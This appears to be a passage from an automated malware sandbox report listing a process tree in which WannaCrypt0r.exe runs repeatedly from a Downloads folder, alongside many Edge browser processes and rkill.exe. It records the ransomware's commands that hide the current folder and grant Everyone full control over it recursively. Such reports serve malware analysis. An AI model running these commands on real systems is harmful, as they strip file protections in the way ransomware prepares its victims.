- C:\Users\Admin\Downloads\WannaCrypt0r.exe
  "C:\Users\Admin\Downloads\WannaCrypt0r.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1240
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2668
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:6004
- C:\Users\Admin\Downloads\WannaCrypt0r.exe
  "C:\Users\Admin\Downloads\WannaCrypt0r.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3576
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:5268
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5804
- C:\Users\Admin\Downloads\WannaCrypt0r.exe
  "C:\Users\Admin\Downloads\WannaCrypt0r.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1220
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:4916
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7100,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8568,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8580 /prefetch:8
  2⤵
  PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8532,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8312 /prefetch:8
  2⤵
  PID:1128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=8516,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6216 /prefetch:1
  2⤵
  PID:748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8432,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=3424 /prefetch:8
  2⤵
  PID:5800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=6196,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8064 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=8660,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6932 /prefetch:1
  2⤵
  PID:5604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=6320,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8832 /prefetch:1
  2⤵
  PID:1520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=8784,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6600 /prefetch:1
  2⤵
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8792,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=9136 /prefetch:8
  2⤵
  PID:332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=9344,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=9364 /prefetch:1
  2⤵
  PID:1820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=9480,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=9468 /prefetch:1
  2⤵
  PID:2264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=9496,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=9628 /prefetch:1
  2⤵
  PID:6068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=9828,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=9488 /prefetch:1
  2⤵
  PID:3384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=9980,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=10016 /prefetch:1
  2⤵
  PID:60
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=10196,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=9764 /prefetch:1
  2⤵
  PID:5056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=10316,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=10360 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=10368,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=10380 /prefetch:1
  2⤵
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=10548,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=10560 /prefetch:1
  2⤵
  PID:6060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=10556,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=10748 /prefetch:1
  2⤵
  PID:4768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=10852,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=10876 /prefetch:1
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=11012,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11028 /prefetch:1
  2⤵
  PID:956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=11172,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11184 /prefetch:1
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=11176,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11344 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=11484,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11500 /prefetch:1
  2⤵
  PID:1292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --always-read-main-dll --field-trial-handle=11640,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11656 /prefetch:1
  2⤵
  PID:228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --always-read-main-dll --field-trial-handle=11884,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11908 /prefetch:1
  2⤵
  PID:2616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=12040,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=12064 /prefetch:1
  2⤵
  PID:6092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=12068,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=12220 /prefetch:1
  2⤵
  PID:4604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=12360,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=12396 /prefetch:1
  2⤵
  PID:6140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=12044,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=12724 /prefetch:1
  2⤵
  PID:6684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --always-read-main-dll --field-trial-handle=10404,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=12808 /prefetch:1
  2⤵
  PID:6692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --always-read-main-dll --field-trial-handle=12824,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=12964 /prefetch:1
  2⤵
  PID:6704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --always-read-main-dll --field-trial-handle=12644,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=13164 /prefetch:1
  2⤵
  PID:7016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --always-read-main-dll --field-trial-handle=12944,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=13104 /prefetch:1
  2⤵
  PID:7096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --always-read-main-dll --field-trial-handle=13424,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=13440 /prefetch:1
  2⤵
  PID:7104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --always-read-main-dll --field-trial-handle=13584,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=13596 /prefetch:1
  2⤵
  PID:7112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --always-read-main-dll --field-trial-handle=13740,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=13752 /prefetch:1
  2⤵
  PID:7120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --always-read-main-dll --field-trial-handle=13892,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=13908 /prefetch:1
  2⤵
  PID:7128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --always-read-main-dll --field-trial-handle=13876,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11168 /prefetch:1
  2⤵
  PID:6724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --always-read-main-dll --field-trial-handle=14220,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=14216 /prefetch:1
  2⤵
  PID:2496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --always-read-main-dll --field-trial-handle=14344,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=14360 /prefetch:1
  2⤵
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --always-read-main-dll --field-trial-handle=14176,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11564 /prefetch:1
  2⤵
  PID:6784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --always-read-main-dll --field-trial-handle=10188,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=13932 /prefetch:1
  2⤵
  PID:6812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --always-read-main-dll --field-trial-handle=10728,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=12940 /prefetch:1
  2⤵
  PID:7188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --always-read-main-dll --field-trial-handle=14520,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8112 /prefetch:1
  2⤵
  PID:7444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --always-read-main-dll --field-trial-handle=14776,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=14792 /prefetch:1
  2⤵
  PID:7564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --always-read-main-dll --field-trial-handle=14212,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=14208 /prefetch:1
  2⤵
  PID:7696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --always-read-main-dll --field-trial-handle=13256,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=14300 /prefetch:1
  2⤵
  PID:7704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --always-read-main-dll --field-trial-handle=8592,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=14860 /prefetch:1
  2⤵
  PID:7632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3708,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=14672 /prefetch:8
  2⤵
  PID:5840
- C:\Users\Admin\Downloads\rkill.exe
  "C:\Users\Admin\Downloads\rkill.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- - C:\Users\Admin\Downloads\rkill64.exe
    C:\Users\Admin\Downloads\rkill.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=11540,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=11608 /prefetch:8
  2⤵
  PID:6248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --always-read-main-dll --field-trial-handle=6244,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=9304 /prefetch:1
  2⤵
  PID:8060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
